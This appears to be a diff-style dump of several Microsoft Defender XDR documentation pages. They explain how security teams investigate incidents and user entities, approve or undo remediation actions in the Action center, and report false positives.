--- Severity.-- The entities that were involved in the alert.-- The source of the alerts (Microsoft Defender for Identity, Microsoft Defender for Endpoint, Microsoft Defender for Office 365, Defender for Cloud Apps, and the app governance add-on).-- The reason they were linked together.-
-Here's an example.
--
-By default, the alerts are ordered chronologically to allow you to see how the attack played out over time. When you select an alert within an incident, Microsoft Defender XDR displays the alert information specific to the context of the overall incident.
-
-You can see the events of the alert, which other triggered alerts caused the current alert, and all the affected entities and activities involved in the attack, including devices, files, users, and mailboxes.
-
-Here's an example.
--
-Learn how to use the alert queue and alert pages in [investigate alerts](investigate-alerts.md).
-
-## Assets
-
-Easily view and manage all your assets in one place with the new **Assets** tab. This unified view includes Devices, Users, Mailboxes and Apps.
-
-The Assets tab displays the total number of assets beside its name. A list of different categories with the number of assets within that category is presented when selecting the Assets tab.
--
-### Devices
-
-The **Devices** view lists all the devices related to the incident. Here's an example.
--
-Selecting a device from the list opens a bar that allows you to manage the selected device. You can quickly export, manage tags, initiate automated investigation, and more.
-
-You can select the check mark for a device to see details of the device, directory data, active alerts, and logged on users. Select the name of the device to see device details in the Defender for Endpoint device inventory. Here's an example.
--
-From the device page, you can gather additional information about the device, such as all of its alerts, a timeline, and security recommendations. For example, from the **Timeline** tab, you can scroll through the device timeline and view all events and behaviors observed on the machine in chronological order, interspersed with the alerts raised. Here's an example
--
-> [!TIP]
-> You can do on-demand scans on a device page. In the Microsoft Defender portal, choose **Endpoints > Device inventory**. Select a device that has alerts, and then run an antivirus scan. Actions, such as antivirus scans, are tracked and are visible on the **Device inventory** page. To learn more, see [Run Microsoft Defender Antivirus scan on devices](/microsoft-365/security/defender-endpoint/respond-machine-alerts#run-microsoft-defender-antivirus-scan-on-devices).
-
-### Users
-
-The **Users** view lists all the users that have been identified to be part of or related to the incident. Here's an example.
--
-You can select the check mark for a user to see details of the user account threat, exposure, and contact information. Select the user name to see additional user account details.
-
-Learn how to view additional user information and manage the users of an incident in [investigate users](investigate-users.md).
-
-### Mailboxes
-
-The **Mailboxes** view lists all the mailboxes that have been identified to be part of or related to the incident. Here's an example.
--
-You can select the check mark for a mailbox to see a list of active alerts. Select the mailbox name to see additional mailbox details on the Explorer page for Defender for Office 365.
-
-### Apps
-
-The **Apps** view lists all the apps identified to be part of or related to the incident. Here's an example.
--
-You can select the check mark for an app to see a list of active alerts. Select the app name to see additional details on the Explorer page for Defender for Cloud Apps.
-
-## Investigations
-
-The **Investigations** tab lists all the [automated investigations](m365d-autoir.md) triggered by alerts in this incident. Automated investigations will perform remediation actions or wait for analyst approval of actions, depending on how you configured your automated investigations to run in Defender for Endpoint and Defender for Office 365.
--
-Select an investigation to navigate to its details page for full information on the investigation and remediation status. If there are any actions pending for approval as part of the investigation, they will appear in the **Pending actions history** tab. Take action as part of incident remediation.
-
-There is also an **Investigation graph** tab that shows:
--- The connection of alerts to the impacted assets in your organization.-- Which entities are related to which alerts and how they are part of the story of the attack.-- The alerts for the incident.-
-The investigation graph helps you quickly understand the full scope of the attack by connecting the different suspicious entities that are part of the attack with their related assets such as users, devices, and mailboxes.
-
-For more information, see [Automated investigation and response in Microsoft Defender XDR](m365d-autoir.md).
-
-## Evidence and Response
-
-The **Evidence and Response** tab shows all the supported events and suspicious entities in the alerts in the incident. Here's an example.
--
-Microsoft Defender XDR automatically investigates all the incidents' supported events and suspicious entities in the alerts, providing you with information about the important emails, files, processes, services, IP Addresses, and more. This helps you quickly detect and block potential threats in the incident.
-
-Each of the analyzed entities is marked with a verdict (Malicious, Suspicious, Clean) and a remediation status. This helps you understand the remediation status of the entire incident and what next steps can be taken.
-
-### Approve or reject remediation actions
-
-For incidents with a remediation status of **Pending approval**, you can approve or reject a remediation action from within the incident.
-
-1. In the navigation pane, go to **Incidents & alerts** \> **Incidents**.
-2. Filter on **Pending action** for the Automated investigation state (optional).
-3. Select an incident name to open its summary page.
-4. Select the **Evidence and Response** tab.
-5. Select an item in the list to open its flyout pane.
-6. Review the information, and then take one of the following steps:
- - Select the Approve pending action option to initiate a pending action.
- - Select the Reject pending action option to prevent a pending action from being taken.
--
-## Next steps
-
-As needed:
--- [Investigate the alerts of an incident](investigate-alerts.md)-- [Investigate the users of an incident](investigate-users.md)-
-## See also
--- [Incidents overview](incidents-overview.md)-- [Prioritize incidents](incident-queue.md)-- [Manage incidents](manage-incidents.md)
security Investigate Users https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/investigate-users.md
- Title: Investigate users in Microsoft Defender XDR
-description: Investigate users for an incident in the Microsoft Defender portal.
--- NOCSH----
- - m365-security
- - tier2
- - usx-security
-- Previously updated : 03/29/2024
-appliesto:
- - Microsoft Defender XDR
- - Microsoft Sentinel in the Microsoft Defender portal
--
-# User entity page in Microsoft Defender
-
-The user entity page in the Microsoft Defender portal helps you in your investigation of user entities. The page contains all the important information about a given user entity. If an alert or incident indicates that a user might be compromised or is suspicious, check and investigate the user entity.
-
-You can find user entity information in the following views:
--- Identities page, under **Assets**-- Alerts queue-- Any individual alert/incident-- Devices page-- Any individual device entity page-- Activity log-- Advanced hunting queries-- Action center-
-Wherever user entities appear in these views, select the entity to view the **User** page, which displays more details about the user. For example, you can see the details of user accounts identified in the alerts of an incident in the Microsoft Defender portal at **Incidents & alerts > Incidents > *incident* > Assets > Users**.
--
-When you investigate a specific user entity, you see the following tabs on its entity page:
--- [Overview](#overview), including entity details, incidents and alerts visual view, investigation priority, and scored timeline-- [Incidents and alerts](#incidents-and-alerts) tab-- [Observed in organization](#observed-in-organization) tab-- [Timeline](#timeline) tab-- [Sentinel events](#sentinel-events) tab-
-The user page shows the Microsoft Entra organization as well as groups, helping you understand the groups and permissions associated with a user.
-
-## Overview
-
-### Entity details
-
-The **Entity details** panel on the left side of the page provides information about the user, such as the Microsoft Entra identity risk level, the number of devices the user is signed in to, when the user was first and last seen, the user's accounts, groups that the user belongs to, contact information, and more. You see other details depending on the integration features you enabled.
-
-### Visual view of incidents and alerts
-
-This card includes all incidents and alerts associated with the user entity, grouped by severity.
-
-### Investigation priority
-
-This card includes the user entity's calculated investigation priority score breakdown, and a two-week trend for that score, including the percentile of the score in relation to the tenant.
-
-### Active directory account controls
-
-This card surfaces Microsoft Defender for Identity security settings that may need your attention. You can see important flags about the user's account settings, such as if the user can press enter to bypass the password, and if the user has a password that never expires, etc.
-
-For more information, see [User Account Control flags](/windows/win32/adschema/a-useraccountcontrol).
-
-### Scored activities
-
-This card includes all activities and alerts contributing to the entity's investigation priority score over the last seven days.
-
-### Organization tree
-
-This section shows the user entity's place in the organizational hierarchy as reported by Microsoft Defender for Identity.
-
-### Account tags
-
-Microsoft Defender for Identity pulls tags out of Active Directory to give you a single interface for monitoring your Active Directory users and entities. Tags provide you with details from Active Directory about the entity, and include:
-
-|Name | Description |
-|--|-|
-| **New** | Indicates that the entity was created less than 30 days ago. |
-| **Deleted** | Indicates that the entity was permanently deleted from Active Directory. |
-| **Disabled** | Indicates that the entity is currently disabled in Active Directory. The *disabled* attribute is an Active Directory flag that's available for user accounts, computer accounts, and other objects to indicate that the object is not currently in use. <br><br>When an object is disabled, it can't be used to sign in or perform actions in the domain.|
-| **Enabled** | Indicates that the entity is currently enabled in Active Directory, indicating that the entity is currently in use, and can be used to sign in or perform actions in the domain. |
-| **Expired** | Indicates that the entity is expired in Active Directory. When a user account is expired, the user is no longer able to log in to the domain or access any network resources. The expired account is essentially treated as if it were disabled, but with an explicit expiration date set. <br><br>Any services or applications that the user was authorized to access may also be affected, depending on how they are configured. |
-| **Honeytoken** | Indicates that the entity is manually tagged as a honeytoken. |
-| **Locked** | Indicates that the entity supplied the wrong password too many times, and is now locked. |
-| **Partial** | Indicates that the user, device, or group is not in synch with the domain, and is partially resolved via a global catalog. In this case, some attributes aren't available. |
-| **Unresolved** | Indicates that the device doesn't resolve to a valid identity in the Active Directory forest. No directory information is available. |
-| **Sensitive** | Indicates that the entity is considered as sensitive. |
-
-For more information, see [Defender for Identity entity tags in Microsoft Defender XDR](/defender-for-identity/entity-tags).
-
-> [!NOTE]
-> The organization tree section and the account tags are available when a Microsoft Defender for Identity license is available.
--
-## Incidents and alerts
-
-You can see all active incidents and alerts involving the user from the last six months in this tab. All the information from the main incidents and alerts queues is shown here. This list is a filtered version of the [incidents queue](incidents-overview.md), and shows a short description of the incident or alert, its severity (high, medium, low, informational), its status in the queue (new, in progress, resolved), its classification (not set, false alert, true alert), investigation state, category, who is assigned to address it, and last activity observed.
-
-You can customize the number of items displayed and which columns are displayed for each item. The default behavior is to list 30 items per page. You can also filter the alerts by severity, status, or any other column in the display.
-
-The *impacted entities* column refers to all the device and user entities referenced in the incident or alert.
-
-When an incident or alert is selected, a fly-out appears. From this panel you can manage the incident or alert and view more details such as incident/alert number and related devices. Multiple alerts can be selected at a time.
-
-To see a full page view of an incident or alert, select its title.
--
-## Observed in organization
--- **Devices**: this section shows all the devices the user entity signed into in the prior 180 days, indicating the most and least used.--- **Locations**: this section shows all the observed locations for the user entity in the last 30 days.--- **Groups**: this section shows all observed on-premises groups for the user entity, as reported by Microsoft Defender for Identity.--- **Lateral movement paths**: this section shows all profiled lateral movement paths from the on-premises environment, as detected by Defender for Identity.-
-> [!NOTE]
-> Groups and lateral movement paths are available when a Microsoft Defender for Identity license is available.
-
-Selecting the **Lateral movements** tab lets you view a fully dynamic and clickable map where you can see the lateral movement paths to and from a user. An attacker can use the path information to infiltrate your network.
-
-The map provides a list of other devices or users an attacker can take advantage of to compromise a sensitive account. If the user has a sensitive account, you can see how many resources and accounts are directly connected.
-
-The lateral movement path report, which can be viewed by date, is always available to provide information about the potential lateral movement paths discovered and can be customized by time. Select a different date using **View a different date** to view previous lateral movement paths found for an entity. The graph only displays if a potential lateral movement path has been found for an entity in the past two days.
--
-## Timeline
-
-The timeline displays user activities and alerts observed from a user's identity in the last 30 days. It unifies the user's identity entries across Microsoft Defender for Identity, Microsoft Defender for Cloud Apps, and Microsoft Defender for Endpoint workloads. By using the timeline, you can focus on activities a user performed or were performed on them in specific timeframes.
-
-For users of the unified SOC platform to see alerts from Microsoft Sentinel based on data sources other than the ones in the previous paragraph, they can find these alerts and other information in the **Sentinel events** tab, [described below](#sentinel-events).
--- **Custom time range picker:** You can choose a timeframe to focus your investigation on the last 24 hours, the last 3 days and so on. Or you can choose a specific timeframe by clicking on **Custom range**. For example:-
- :::image type="content" source="../../media/image.png" alt-text="Screenshot that shows how to choose time frame." lightbox="../../media/image.png":::
--- **Timeline filters:** In order to improve your investigation experience, you can use the timeline filters: Type (Alerts and/or user's related activities), Alert severity, Activity type, App, Location, Protocol. Each filter depends on the others, and the options in each filter (drop-down) only contains the data that is relevant for the specific user.--- **Export button:** You can export the timeline to a CSV file. Export is limited to the first 5000 records and contains the data as it displays in the UI (same filters and columns).--- **Customized columns:** You can choose which columns to expose in the timeline by selecting the **Customize columns** button. For example:-
- :::image type="content" source="../../media/image2.png" alt-text="Screenshot that shows the user's image." lightbox="../../media/image2.png":::
-
-### What data types are available?
-
-The following data types are available in the timeline:
--- A user's impacted alerts-- Active Directory and Microsoft Entra activities-- Cloud apps' events-- Device logon events-- Directory services changes-
-### What information is displayed?
-
-The following information is displayed in the timeline:
--- Date and time of the activity-- Activity/alert description-- Application that performed the activity-- Source device/IP address-- [MITRE ATT&CK](https://attack.mitre.org/) techniques-- Alert severity and status-- Country/region where the client IP address is geolocated-- Protocol used during the communication-- Target device (optional, viewable by customizing columns)-- Number of times the activity happened (optional, viewable by customizing columns)-
-For example:
--
-> [!NOTE]
-> Microsoft Defender XDR can display date and time information using either your local time zone or UTC. The selected time zone will apply to all date and time information shown in the Identity timeline.
->
-> To set the time zone for these features, go to **Settings** \> **Security center** \> **Time zone**.
-
-## Sentinel events
-
-If your organization onboarded Microsoft Sentinel to the Defender portal, this additional tab is on the user entity page. This tab imports the [Account entity page from Microsoft Sentinel](/azure/sentinel/entity-pages).
-
-### Sentinel timeline
-
-This timeline shows alerts associated with the user entity. These alerts include those seen on the **Incidents and alerts** tab and those created by Microsoft Sentinel from third-party, non-Microsoft data sources.
-
-This timeline also shows [bookmarked hunts](/azure/sentinel/bookmarks) from other investigations that reference this user entity, user activity events from external data sources, and unusual behaviors detected by Microsoft Sentinel's [anomaly rules](/azure/sentinel/soc-ml-anomalies).
-
-### Insights
-
-Entity insights are queries defined by Microsoft security researchers to help you investigate more efficiently and effectively. These insights automatically ask the big questions about your user entity, providing valuable security information in the form of tabular data and charts. The insights include data regarding sign-ins, group additions, anomalous events and more, and include advanced machine learning algorithms to detect anomalous behavior.
-
-The following are some of the insights shown:
--- User peers based on security groups membership.-- Actions by account.-- Actions on account.-- Event logs cleared by user.-- Group additions.-- Anomalously high office operation count.-- Resource access.-- Anomalously high Azure sign-in result count.-- UEBA insights.-- User access permissions to Azure subscriptions.-- Threat indicators related to user.-- Watchlist insights (Preview).-- Windows sign-in activity.-
-The insights are based on the following data sources:
--- Syslog (Linux)-- SecurityEvent (Windows)-- AuditLogs (Microsoft Entra ID)-- SigninLogs (Microsoft Entra ID)-- OfficeActivity (Office 365)-- BehaviorAnalytics (Microsoft Sentinel UEBA)-- Heartbeat (Azure Monitor Agent)-- CommonSecurityLog (Microsoft Sentinel)--
-If you want to further explore any of the insights in this panel, select the link accompanying the insight. The link takes you to the **Advanced hunting** page, where it displays the query underlying the insight, along with its raw results. You can modify the query or drill down into the results to expand your investigation or just satisfy your curiosity.
--
-## Remediation actions
-
-From the Overview page, you can do these additional actions:
--- Enable, disable, or suspend the user in Microsoft Entra ID-- Direct user to do certain actions such as require the user to sign in again or force password reset-- Reset investigation priority score for the user-- View Microsoft Entra account settings, related governance, the user's owned files, or the user's shared files--
-For more information, see [Remediation actions in Microsoft Defender for Identity](/defender-for-identity/remediation-actions).
-
-## Next steps
-
-As needed for in-process incidents, continue your [investigation](investigate-incidents.md).
-
-## See also
--- [Incidents overview](incidents-overview.md)-- [Prioritize incidents](incident-queue.md)-- [Manage incidents](manage-incidents.md)-- [Microsoft Defender XDR overview](microsoft-365-defender.md)-- [Turn on Microsoft Defender XDR](m365d-enable.md)-- [Device entity page in Microsoft Defender](entity-page-device.md)-- [IP address entity page in Microsoft Defender](entity-page-ip.md)-- [Microsoft Defender XDR integration with Microsoft Sentinel](microsoft-365-defender-integration-with-azure-sentinel.md)-- [Connect Microsoft Sentinel to Microsoft Defender XDR (preview)](microsoft-sentinel-onboard.md)--
security M365d Action Center https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/m365d-action-center.md
- Title: Go to the Action center to view and approve your automated investigation and remediation tasks
-description: Use the Action center to view details about automated investigation and approve pending actions
--- NOCSH-- Previously updated : 08/11/2023---- m365-security-- tier2---- autoir-- admindeeplinkDEFENDER---
-# The Action center
-
-**Applies to:**
-- Microsoft Defender XDR-
-The Action center provides a "single pane of glass" experience for incident and alert tasks such as:
--- Approving pending remediation actions.-- Viewing an audit log of already approved remediation actions.-- Reviewing completed remediation actions.-
-Because the Action center provides a comprehensive view of Microsoft Defender XDR at work, your security operations team can operate more effectively and efficiently.
-
-## The unified Action center
-
-The unified Action center ([https://security.microsoft.com/action-center](https://security.microsoft.com/action-center)) lists pending and completed remediation actions for your devices, email & collaboration content, and identities in one location.
--
-For example:
--- If you were using the Action center in the Microsoft Defender Security Center ([https://securitycenter.windows.com/action-center](https://securitycenter.windows.com/action-center)), try the unified Action center in the <a href="https://go.microsoft.com/fwlink/p/?linkid=2077139" target="_blank">Microsoft Defender portal</a>.-- If you were already using the <a href="https://go.microsoft.com/fwlink/p/?linkid=2077139" target="_blank">Microsoft Defender portal</a>, you'll see several improvements in the Action center ([https://security.microsoft.com/action-center](https://security.microsoft.com/action-center)).-
-The unified Action center brings together remediation actions across Defender for Endpoint and Defender for Office 365. It defines a common language for all remediation actions and provides a unified investigation experience. Your security operations team has a "single pane of glass" experience to view and manage remediation actions.
-
-You can use the unified Action center if you have appropriate permissions and one or more of the following subscriptions:
--- [Defender for Endpoint](../defender-endpoint/microsoft-defender-endpoint.md)-- [Defender for Office 365](/microsoft-365/security/office-365-security/defender-for-office-365)-- [Microsoft Defender XDR](microsoft-365-defender.md)-
-> [!TIP]
-> To learn more, see [Requirements](./prerequisites.md).
-
-You can navigate to the list of actions pending approval in two different ways:
--- Go to [https://security.microsoft.com/action-center](https://security.microsoft.com/action-center); or-- In the Microsoft Defender portal ([https://security.microsoft.com](https://security.microsoft.com)), in the Automated investigation & response card, select **Approve in Action Center**.-
-## Using the Action center
-
-1. Go to <a href="https://go.microsoft.com/fwlink/p/?linkid=2077139" target="_blank">Microsoft Defender portal</a> and sign in.
-
-2. In the navigation pane under **Actions and submissions**, choose **Action center**. Or, in the Automated investigation & response card, select **Approve in Action Center**.
-
-3. Use the **Pending actions** and **History** tabs. The following table summarizes what you'll see on each tab:
-
- |Tab |Description |
- |||
- |**Pending** | Displays a list of actions that require attention. You can approve or reject actions one at a time, or select multiple actions if they have the same type of action (such as Quarantine file). <br/><br/>Make sure to review and approve (or reject) pending actions as soon as possible so that your automated investigations can complete in a timely manner. |
- |**History** | Serves as an audit log for actions that were taken, such as: <br/>- Remediation actions that were taken as a result of automated investigations <br/>- Remediation actions that were taken on suspicious or malicious email messages, files, or URLs<br/>- Remediation actions that were approved by your security operations team <br/>- Commands that were run and remediation actions that were applied during Live Response sessions<br/>- Remediation actions that were taken by your antivirus protection<br/><br/>Provides a way to undo certain actions (see [Undo completed actions](m365d-autoir-actions.md#undo-completed-actions)). |
-
-4. You can customize, sort, filter, and export data in the Action center.
-
- :::image type="content" source="../../media/m3d-action-center-columnsfilters.png" alt-text="Screenshot that shows the sort, filter, and customize capabilities of the Action center." lightbox="../../media/m3d-action-center-columnsfilters.png":::
-
- - Select a column heading to sort items in ascending or descending order.
- - Use the time period filter to view data for the past day, week, 30 days, or 6 months.
- - Choose the columns that you want to view.
- - Specify how many items to include on each page of data.
- - Use filters to view just the items you want to see.
- - Select **Export** to export results to a .csv file.
-
-## Actions tracked in the Action center
-
-All actions, whether they're pending approval or were already taken, are tracked in the Action center. Available actions include the following:
--- Collect investigation package -- Isolate device (this action can be undone) -- Offboard machine -- Release code execution -- Release from quarantine -- Request sample -- Restrict code execution (this action can be undone) -- Run antivirus scan -- Stop and quarantine -- Contain devices from the network-
-In addition to remediation actions that are taken automatically as a result of [automated investigations](m365d-autoir.md), the Action center also tracks actions your security team has taken to address detected threats, and actions that were taken as a result of threat protection features in Microsoft Defender XDR. For more information about automatic and manual remediation actions, see [Remediation actions](m365d-remediation-actions.md).
-
-## Viewing action source details
-
-(**NEW!**) The improved Action center now includes an **Action source** column that tells you where each action came from. The following table describes possible **Action source** values:
-
-| Action source value | Description |
-|:--|:|
-| **Manual device action** | A manual action taken on a device. Examples include [device isolation](../defender-endpoint/respond-machine-alerts.md#isolate-devices-from-the-network) or [file quarantine](../defender-endpoint/respond-file-alerts.md#stop-and-quarantine-files). |
-| **Manual email action** | A manual action taken on email. An example includes soft-deleting email messages or [remediating an email message](../office-365-security/remediate-malicious-email-delivered-office-365.md). |
-| **Automated device action** | An automated action taken on an entity, such as a file or process. Examples of automated actions include sending a file to quarantine, stopping a process, and removing a registry key. (See [Remediation actions in Microsoft Defender for Endpoint](../defender-endpoint/manage-auto-investigation.md#remediation-actions).) |
-| **Automated email action** | An automated action taken on email content, such as an email message, attachment, or URL. Examples of automated actions include soft-deleting email messages, blocking URLs, and turning off external mail forwarding. (See [Remediation actions in Microsoft Defender for Office 365](../office-365-security/air-remediation-actions.md).) |
-| **Advanced hunting action** | Actions taken on devices or email with [advanced hunting](./advanced-hunting-overview.md). |
-| **Explorer action** | Actions taken on email content with [Explorer](../office-365-security/threat-explorer-real-time-detections-about.md). |
-| **Manual live response action** | Actions taken on a device with [live response](../defender-endpoint/live-response.md). Examples include deleting a file, stopping a process, and removing a scheduled task. |
-| **Live response action** | Actions taken on a device with [Microsoft Defender for Endpoint APIs](../defender-endpoint/management-apis.md#microsoft-defender-for-endpoint-apis). Examples of actions include isolating a device, running an antivirus scan, and getting information about a file. |
-
-## Required permissions for Action center tasks
-
-To perform tasks, such as approving or rejecting pending actions in the Action center, you must have permissions assigned as listed in the following table:
-
-|Remediation action |Required roles and permissions |
-|--|-|
-|Microsoft Defender for Endpoint remediation (devices) |**Security Administrator** role assigned in either Microsoft Entra ID ([https://portal.azure.com](https://portal.azure.com)) or the Microsoft 365 admin center ([https://admin.microsoft.com](https://admin.microsoft.com))<br/> or <br/>**Active remediation actions** role assigned in Microsoft Defender for Endpoint <br/> <br/> To learn more, see the following resources: <br/>- [Microsoft Entra built-in roles](/azure/active-directory/roles/permissions-reference)<br/>- [Create and manage roles for role-based access control (Microsoft Defender for Endpoint)](../defender-endpoint/user-roles.md) |
-|Microsoft Defender for Office 365 remediation (Office content and email) |**Security Administrator** role assigned in either Microsoft Entra ID ([https://portal.azure.com](https://portal.azure.com)) or the Microsoft 365 admin center ([https://admin.microsoft.com](https://admin.microsoft.com))<br/> and <br/>**Search and Purge** role assigned in the Microsoft Defender XDR > [Email & collaboration roles](https://security.microsoft.com/emailandcollabpermissions) <br/><br/>**IMPORTANT**: If you have the **Security Administrator** role assigned only in the Microsoft Defender XDR > [Email & collaboration roles](https://security.microsoft.com/emailandcollabpermissions), you will not be able to access the Action center or Microsoft Defender XDR capabilities. You must have the Security Administrator role assigned in Microsoft Entra ID or the Microsoft 365 admin center. <br/><br/>To learn more, see the following resources: <br/>- [Microsoft Entra built-in roles](/azure/active-directory/roles/permissions-reference)<br/>- [Permissions in the Security & Compliance Center](/microsoft-365/security/office-365-security/scc-permissions) |
-
-> [!TIP]
-> Users who have the **Global Administrator** role assigned in Microsoft Entra ID can approve or reject any pending action in the Action center. However, as a best practice, your organization should limit the number of people who have the **Global Administrator** role assigned. We recommend using the **Security Administrator**, **Active remediation actions**, and **Search and Purge** roles listed in the preceding table for Action center permissions.
-
-## Next step
--- [View and manage remediation actions](m365d-autoir-actions.md)
security M365d Autoir Actions https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/m365d-autoir-actions.md
- Title: View and manage actions in the Action center
-description: Use the Action center to view and manage remediation actions
--- NOCSH-- Previously updated : 08/11/2023---- m365-security-- tier2---- autoir-- admindeeplinkDEFENDER---
-# View and manage actions in the Action center
-
-**Applies to:**
-- Microsoft Defender XDR-
-Threat protection features in Microsoft Defender XDR can result in certain remediation actions. Here are some examples:
--- [Automated investigations](m365d-autoir.md) can result in remediation actions that are taken automatically or await your approval.-- Antivirus, antimalware, and other threat protection features can result in remediation actions, such as blocking a file, URL, or process, or sending an artifact to quarantine.-- Your security operations team can take remediation actions manually, such as during [advanced hunting](advanced-hunting-overview.md) or while investigating [alerts](investigate-alerts.md) or [incidents](investigate-incidents.md).-
-> [!NOTE]
-> You must have [appropriate permissions](m365d-action-center.md#required-permissions-for-action-center-tasks) to approve or reject remediation actions. For more information, see the [prerequisites](m365d-configure-auto-investigation-response.md#prerequisites-for-automated-investigation-and-response-in-microsoft-365-defender).
-
-To navigate to the Action center, take one of the following steps:
--- Go to [https://security.microsoft.com/action-center](https://security.microsoft.com/action-center); or-- In the Microsoft Defender portal ([https://security.microsoft.com](https://security.microsoft.com)), in the Automated investigation & response card, select **Approve in Action Center**.-
-## Review pending actions in the Action center
-
-It's important to approve (or reject) pending actions as soon as possible so that your automated investigations can proceed and complete in a timely manner.
-
-1. Go to <a href="https://go.microsoft.com/fwlink/p/?linkid=2077139" target="_blank">Microsoft Defender portal</a> and sign in.
-
-2. In the navigation pane under Actions and submissions, choose **Action center**.
-
-3. In the Action center, on the **Pending** tab, select an item in the list. Its flyout pane opens. Here's an example.
-
- :::image type="content" source="../../media/air-actioncenter-itemselected.png" alt-text="The options to approve or reject an action" lightbox="../../media/air-actioncenter-itemselected.png":::
-
-4. Review the information in the flyout pane, and then take one of the following steps:
- - Select **Open investigation page** to view more details about the investigation.
- - Select **Approve** to initiate a pending action.
- - Select **Reject** to prevent a pending action from being taken.
- - Select **Go hunt** to go into [Advanced hunting](advanced-hunting-overview.md).
-
-> [!TIP]
-> You now have more options to review and approve/reject a remediation action. In addition to using the Action center, you can also approve or reject a remediation action while reviewing an incident. For more information, see [Approve or reject remediation actions](./investigate-incidents.md#approve-or-reject-remediation-actions).
-
-## Undo completed actions
-
-If you've determined that a device or a file is not a threat, you can undo remediation actions that were taken, whether those actions were taken automatically or manually. In the Action center, on the **History** tab, you can undo any of the following actions:
-
-| Action source | Supported Actions |
-|:|:|
-| - Automated investigation <br/>- Microsoft Defender Antivirus <br/>- Manual response actions | - Isolate device <br/>- Restrict code execution <br/>- Quarantine a file <br/>- Remove a registry key <br/>- Stop a service <br/>- Disable a driver <br/>- Remove a scheduled task |
-
-### Undo one remediation action
-
-1. Go to the Action center ([https://security.microsoft.com/action-center](https://security.microsoft.com/action-center)) and sign in.
-
-2. On the **History** tab, select an action that you want to undo.
-
-3. In the pane on the right side of the screen, select **Undo**.
-
-### Undo multiple remediation actions
-
-1. Go to the Action center (https://security.microsoft.com/action-center) and sign in.
-
-2. On the **History** tab, select the actions that you want to undo. Make sure to select items that have the same Action type. A flyout pane opens.
-
-3. In the flyout pane, select **Undo**.
-
-### To remove a file from quarantine across multiple devices
-
-1. Go to the Action center ([https://security.microsoft.com/action-center](https://security.microsoft.com/action-center)) and sign in.
-
-2. On the **History** tab, select a file that has a **Quarantine file** Action type.
-
-3. In the pane on the right side of the screen, select **Apply to X more instances of this file**, and then select **Undo**.
-
-## Next steps
--- [View the details and results of an automated investigation](m365d-autoir-results.md)-- [Address false positives or false negatives](m365d-autoir-report-false-positives-negatives.md)
security M365d Autoir Report False Positives Negatives https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/m365d-autoir-report-false-positives-negatives.md
- Title: Address false positives or false negatives in Microsoft Defender XDR
-description: Was something missed or wrongly detected by AIR in Microsoft Defender XDR? Learn how to submit false positives or false negatives to Microsoft for analysis.
--- NOCSH------ m365-security-- tier2---- autoir-- admindeeplinkDEFENDER- Previously updated : 07/14/2023--
-# Address false positives or false negatives in Microsoft Defender XDR
--
-**Applies to:**
-- Microsoft Defender XDR-
-False positives or negatives can occasionally occur with any threat protection solution. If [automated investigation and response capabilities](m365d-autoir.md) in Microsoft Defender XDR missed or wrongly detected something, there are steps your security operations team can take:
--- [Report a false positive/negative to Microsoft](#report-a-false-positivenegative-to-microsoft-for-analysis)-- [Adjust your alerts](#adjust-an-alert-to-prevent-false-positives-from-recurring) (if needed)-- [Undo remediation actions that were taken on devices](#undo-a-remediation-action-that-was-taken-on-a-device)-
-The following sections describe how to perform these tasks.
-
-## Report a false positive/negative to Microsoft for analysis
-
-|Item missed or wrongly detected |Service |What to do |
-||||
-|- Email message <br/>- Email attachment <br/>- URL in an email message<br/>- URL in an Office file |[Microsoft Defender for Office 365](/microsoft-365/security/office-365-security/defender-for-office-365) |[Submit suspected spam, phish, URLs, and files to Microsoft for scanning](../office-365-security/submissions-admin.md) |
-|File or app on a device |[Microsoft Defender for Endpoint](/windows/security/threat-protection) |[Submit a file to Microsoft for malware analysis](https://www.microsoft.com/wdsi/filesubmission) |
-
-## Adjust an alert to prevent false positives from recurring
-
-|Scenario |Service |What to do |
-|--|--|--|
-|- An alert is triggered by legitimate use <br/>- An alert is inaccurate |[Microsoft Defender for Cloud Apps](/cloud-app-security)<br/> or <br/>[Azure threat protection](/azure/security/fundamentals/threat-detection) |[Manage alerts in the Defender for Cloud Apps portal](/cloud-app-security/managing-alerts) |
-|A file, IP address, URL, or domain is treated as malware on a device, even though it's safe|[Microsoft Defender for Endpoint](/windows/security/threat-protection) |[Create a custom indicator with an "Allow" action](/windows/security/threat-protection/microsoft-defender-atp/manage-indicators) |
-
-## Undo a remediation action that was taken on a device
-
-If a remediation action was taken on an entity (such as a device or an email message) and the affected entity is not actually a threat, your security operations team can undo the remediation action in the [Action center](m365d-action-center.md).
-
-1. Go to <a href="https://go.microsoft.com/fwlink/p/?linkid=2077139" target="_blank">Microsoft Defender portal</a> and sign in.
-2. In the navigation pane, choose **Action center**.
-3. On the **History** tab, select an action that you want to undo. Its flyout pane opens.
-4. In the flyout pane, select **Undo**.
-
-> [!TIP]
-> See [Undo completed actions](m365d-autoir-actions.md#undo-completed-actions).
-
-## See also
--- [View the details and results of an automated investigation](m365d-autoir-results.md)-- [Proactively hunt for threats with advanced hunting in Microsoft Defender XDR](advanced-hunting-overview.md)
security M365d Autoir Results https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/m365d-autoir-results.md
- Title: Details and results of an automated investigation
-description: View the results and key findings of automated investigation in Microsoft Defender XDR
--- NOCSH-- Previously updated : 08/11/2022---- m365-security-- tier2---- autoir-- admindeeplinkDEFENDER---
-# Details and results of an automated investigation
--
-**Applies to:**
-- Microsoft Defender XDR-
-With Microsoft Defender XDR, when an [automated investigation](m365d-autoir.md) runs, details about that investigation are available both during and after the automated investigation process. If you have the [necessary permissions](m365d-action-center.md#required-permissions-for-action-center-tasks), you can view those details in an investigation details view that provides you with up-to-date status and the ability to approve any pending actions.
-
-## (NEW) Unified investigation page
-
-The investigation page has recently been updated to include information across your devices, email, and collaboration content. The new, unified investigation page defines a common language and provides a unified experience for automatic investigations across [Microsoft Defender for Endpoint](/windows/security/threat-protection/microsoft-defender-atp/microsoft-defender-advanced-threat-protection) and [Microsoft Defender for Office 365](../office-365-security/defender-for-office-365.md). To access the unified investigation page, select the link in the yellow banner you'll see on:
